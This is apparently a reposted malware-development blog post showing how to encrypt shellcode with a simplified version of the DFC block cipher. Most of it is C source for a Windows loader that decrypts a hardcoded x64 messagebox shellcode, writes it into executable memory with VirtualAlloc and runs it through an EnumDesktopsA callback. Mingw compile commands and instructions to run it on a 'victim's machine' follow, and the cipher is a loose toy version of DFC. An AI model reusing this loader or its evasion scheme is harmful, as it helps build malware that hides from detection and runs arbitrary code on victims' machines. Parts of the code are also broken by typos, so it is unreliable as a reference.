﷽
Hello, cybersecurity enthusiasts and white hackers!
After my presentation and workshop at a conference in Luxembourg where I touched on the abuse of cryptographic functions in the internal structure of Windows OS, many colleagues and readers increasingly have questions about the use of cryptography in protecting malware during its development.
This post is the result of my own research on using DFC (Decorrelated Fast Cipher) on malware development. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.
DFC
The Decorrelated Fast Cipher (DFC) was developed in 1998
by cryptographers from the École Normale Supérieure, the CNRS, and France Telecom under the leadership of Serge Vaudenay. Designed as a candidate for the Advanced Encryption Standard (AES) competition, DFC is a symmetric block cipher using an 8-round
Feistel network and a 128-bit
block size. Though ultimately not selected as the AES standard, DFC contributed to cryptographic research, particularly in the PEANUT family of ciphers.
The Decorrelated Fast Cipher (DFC) based on an 8-round
Feistel network, with each round processing a 128-bit
block divided into two 64-bit
halves. DFC uses a key schedule to generate 8 unique round keys from a variable-length key of up to 256
bits, while it is commonly implemented with a 128-bit
key. Each round applies a particular encryption function to one half of the block, combines it with the other half, then swaps the halves - a classic Feistel structure that allows for simple decryption by reversing the sequence of the keys.
DFC’s architecture seeks to give excellent security against differential and linear cryptanalysis, and it is notable for using decorrelation theory, which reduces statistical relationships inside encrypted data in order to resist modern cryptographic assaults. Each round’s encryption function employs a pair of 64-bit subkeys derived from the main key, making the cipher suitable for hardware and software implementations.
Although DFC was not chosen as the final AES standard, it presented novel techniques to resisting decorrelation-based attacks, stressing strong security features for symmetric block ciphers. DFC is now a member of the larger PEANUT family (Pretty Encryption Algorithm with n-Universal Transformation), which is notable for using unique mathematical transformations to increase its resistance to cryptanalysis.
practical example
Let’s implement it in practice. Let’s break down the implementation step by step to understand how the DFC-based encryption and decryption functions need to be implemented, focusing on the encryption of a payload. This approach will help you understand each part of the code and how it contributes to the functionality of the DFC cipher.
First of all define constants and key variables:
#define ROUNDS 8
#define BLOCK_SIZE 16
Then we need key schedule generation.
The key schedule function generates eight 128-bit
round keys based on the original encryption key. These round keys are used in each of the Feistel rounds to perform operations on each half of the data block:
void key_schedule(uint8_t* key) {
for (int i = 0; i < ROUNDS; i++) {
for (int j = 0; j < 16; j++) {
K[i][j] = key[j] ^ (i + j);
}
}
}
The round keys are derived by XORing each byte of the main key with the round and byte indices, creating unique keys for each round.
The next one is implement the Feistel round function. In DFC, each round performs operations on the left and right halves of the block. The round function is defined as G
, which takes the left
and right
halves of the block, and a roundKey
.
This function: swaps the left and right halves and XORs the left half (after applying F
function) with the right half and the current round key:
// DFC G function applies Feistel structure in each round
void G(uint32_t* left, uint32_t* right, uint8_t* roundKey) {
uint32_t tempRight = *right;
*right = *left ^ F(*right, *(uint32_t*)roundKey);
*left = tempRight;
}
F
is the core function of the Feistel structure. In my implementation, the F
function for the Decorrelated Fast Cipher (DFC) round uses a bitwise rotation and XOR operation to introduce non-linearity and diffusion in each round:
// function F for DFC round (simplified for illustration)
uint32_t F(uint32_t left, uint32_t key_part) {
return rotl(left + key_part, 3) ^ key_part;
}
Here, left
param is typically the left
half of the data block in the Feistel round, key_part
is a 32-bit
portion of the round key, specific to each Feistel round.
The main logic of this function is simple.
The left
input (half of the data block) is added to the key_part
. This addition introduces dependency on both the current data and the key, making each round sensitive to the specific round key.
The result of the addition is then rotated left by 3 bits (rotl(..., 3)
). Bitwise rotation is used here to disperse the bits across the data, enhancing diffusion. The rotl
function shifts bits to the left by 3
positions, with the leftmost bits wrapping around to the right.
Finally, the result of the rotation is XORed with key_part
. XOR
introduces further non-linearity and ensures that small changes in key_part
or left
lead to significant changes in the output of F
.
The next function we needed is block encryption logic.
The dfc_encrypt
function performs the encryption in a Feistel structure over 8 rounds
. Each round uses a different round key generated from the key schedule:
// DFC encryption function void dfc_encrypt(uint32_t* block, uint8_t* key) { uint32_t left = block[0], right = block[1];
// perform 8 rounds of encryption
for (int i = 0; i < ROUNDS; i++) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
This function initializes left
and right
from the input block. Then for each of the 8 rounds
, applies the G
function to left
and right
with the corresponding round key. Finally, swaps left
and right
to complete the Feistel round and update the block.
The decryption function dfc_decrypt
mirrors the encryption, but the rounds are applied in reverse order:
// DFC decryption function void dfc_decrypt(uint32_t* block, uint8_t* key) { uint32_t left = block[0], right = block[1];
// perform 8 rounds of decryption in reverse
for (int i = ROUNDS - 1; i >= 0; i–) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
As usual, dfc_encrypt_shellcode
prepares shellcode for encryption by applying padding and then encrypting each 128-bit
block:
// function to encrypt shellcode using DFC
void dfc_encrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_encrypt(ptr, key);
ptr += 4; // move to the next 128-bit block (4 * 32-bit words)
}
// handle remaining bytes by padding with 0x90 (NOP)
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_encrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
This function calls key_schedule
to initialize round keys. Then encrypts the main shellcode in 128-bit
blocks. And applies padding if the shellcode length is not a multiple of the block size.
The next one is decryption logic:
// function to decrypt shellcode using DFC
void dfc_decrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_decrypt(ptr, key);
ptr += 4;
}
// handle remaining bytes by padding
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_decrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
Finally, putting it all together in main
:
int main() { unsigned char my_payload[] = "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41" "\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60" "\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72" "\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac" "\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2" "\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48" "\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f" "\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49" "\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01" "\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01" "\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41" "\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b" "\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58" "\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" "\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7" "\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e" "\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83" "\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e" "\x2e\x2e\x5e\x3d\x00";
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len); // pad with NOPs
memcpy(padded, my_payload, my_payload_len);
printf(“original shellcode:\n”);
for (int i = 0; i < my_payload_len; i++) {
printf(“%02x “, my_payload[i]);
}
printf(”\n\n”);
uint8_t key[8] = { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };
dfc_encrypt_shellcode(padded, pad_len, key);
printf(“encrypted shellcode:\n”);
for (int i = 0; i < pad_len; i++) {
printf(“%02x “, padded[i]);
}
printf(”\n\n”);
dfc_decrypt_shellcode(padded, pad_len, key);
printf(“decrypted shellcode:\n”);
for (int i = 0; i < my_payload_len; i++) {
printf(“%02x “, padded[i]);
}
printf(”\n\n”);
// allocate and execute decrypted shellcode
LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, my_payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
As you can, see in the main function I just encrypted/decrypted meow-meow
messagebox payload.
Full source code hack.c
:
/* * hack.c * encrypt/decrypt payload via DFC (Decorrelated Fast Cipher) algorithm * author: @cocomelonc * https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#define ROUNDS 8 // DFC uses 8 rounds of encryption
#define BLOCK_SIZE 16 // DFC operates on 128-bit (16-byte) blocks
// subkeys generated from the main key
uint8_t K[ROUNDS][16];
// rotate left function
uint32_t rotl(uint32_t x, int shift) {
return (x << shift) | (x >> (32 - shift));
}
// function F for DFC round (simplified for illustration)
uint32_t F(uint32_t left, uint32_t key_part) {
return rotl(left + key_part, 3) ^ key_part;
}
// DFC G function applies Feistel structure in each round
void G(uint32_t* left, uint32_t* right, uint8_t* roundKey) {
uint32_t tempRight = *right;
*right = *left ^ F(*right, (uint32_t)roundKey);
*left = tempRight;
}
// key schedule for DFC
void key_schedule(uint8_t* key) {
for (int i = 0; i < ROUNDS; i++) {
for (int j = 0; j < 16; j++) {
K[i][j] = key[j % 8] ^ (i + j); // generate subkey for each round
}
}
}
// DFC encryption function
void dfc_encrypt(uint32_t* block, uint8_t* key) {
uint32_t left = block[0], right = block[1];
// perform 8 rounds of encryption
for (int i = 0; i < ROUNDS; i++) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
// DFC decryption function
void dfc_decrypt(uint32_t* block, uint8_t* key) {
uint32_t left = block[0], right = block[1];
// perform 8 rounds of decryption in reverse
for (int i = ROUNDS - 1; i >= 0; i–) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
// function to encrypt shellcode using DFC
void dfc_encrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_encrypt(ptr, key);
ptr += 4; // move to the next 128-bit block (4 * 32-bit words)
}
// handle remaining bytes by padding with 0x90 (NOP)
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_encrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
// function to decrypt shellcode using DFC
void dfc_decrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_decrypt(ptr, key);
ptr += 4;
}
// handle remaining bytes by padding
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_decrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
int main() {
unsigned char my_payload =
“\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41”
“\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60”
“\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72”
“\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac”
“\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2”
“\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48”
“\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f”
“\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49”
“\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01”
“\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01”
“\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1”
“\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41”
“\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b”
“\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58”
“\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41”
“\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7”
“\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e”
“\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83”
“\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd”
“\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0”
“\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff”
“\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e”
“\x2e\x2e\x5e\x3d\x00”;
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len); // pad with NOPs
memcpy(padded, my_payload, my_payload_len);
printf(“original shellcode:\n”);
for (int i = 0; i < my_payload_len; i++) {
printf(“%02x “, my_payload[i]);
}
printf(”\n\n”);
uint8_t key[8] = { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };
dfc_encrypt_shellcode(padded, pad_len, key);
printf(“encrypted shellcode:\n”);
for (int i = 0; i < pad_len; i++) {
printf(“%02x “, padded[i]);
}
printf(”\n\n”);
dfc_decrypt_shellcode(padded, pad_len, key);
printf(“decrypted shellcode:\n”);
for (int i = 0; i < my_payload_len; i++) {
printf(“%02x “, padded[i]);
}
printf(”\n\n”);
// allocate and execute decrypted shellcode
LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, my_payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
As usual some printing logic is just for checking correctness of logic and running payload via EnumDesktopsA.
demo
Let’s go to see everything in action. Compile it (in my linux
machine):
x86_64-w64-mingw32-gcc -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
Then, just run it in the victim’s machine (windows 11 x64
in my case):
.\hack.exe
As you can see, everything is worked perfectly! =^..^=
Calculating Shannon entropy:
python3 entropy.py -f hack.exe
Our payload in the .text
section.
As you know, many of the encryption algorithms I have looked at in my research and on this blog are used Feistel networks.
cryptoanalysis
The cryptanalysis of Decorrelated Fast Cipher (DFC) has revealed vulnerabilities in its structure, particularly through differential analysis. In 1999, cryptographers Lars Knudsen and Vincent Rijmen (Lars R. Knudsen and Vincent Rijmen. “On The Decorrelated Fast Cipher (DFC) and Its Theory”. Department of Informatics, University of Bergen, N-5020 Bergen. 24 March 1999. 6th International Workshop on Fast Software Encryption (FSE ‘99). Rome: Springer-Verlag. pp. 81–94) discovered that DFC’s 8-round structure could be weakened using differential attacks. Their work demonstrated that a differential attack could successfully break 6 of DFC’s 8 rounds, exploiting the cipher’s susceptibility to differences introduced in specific parts of its Feistel rounds. This attack revealed weaknesses in the diffusion properties of DFC, indicating that, although designed for the AES competition, DFC was less resistant to cryptanalytic techniques than some other candidates.
I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.
https://en.wikipedia.org/wiki/DFC_(cipher)
On The Decorrelated Fast Cipher (DFC) and Its Theory. Lars R. Knudsen and Vincent Rijmen
Malware And Hunting For Persistence: How Adversaries Exploit Your Windows? - Cocomelonc. HACKLU 2024
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine
Article Link: Malware and cryptography 34: encrypt payload via DFC algorithm. Simple C example. - cocomelonc
1 post - 1 participant
Malware Analysis, News and Indicators - Latest topics
Post a Comment
Post a Comment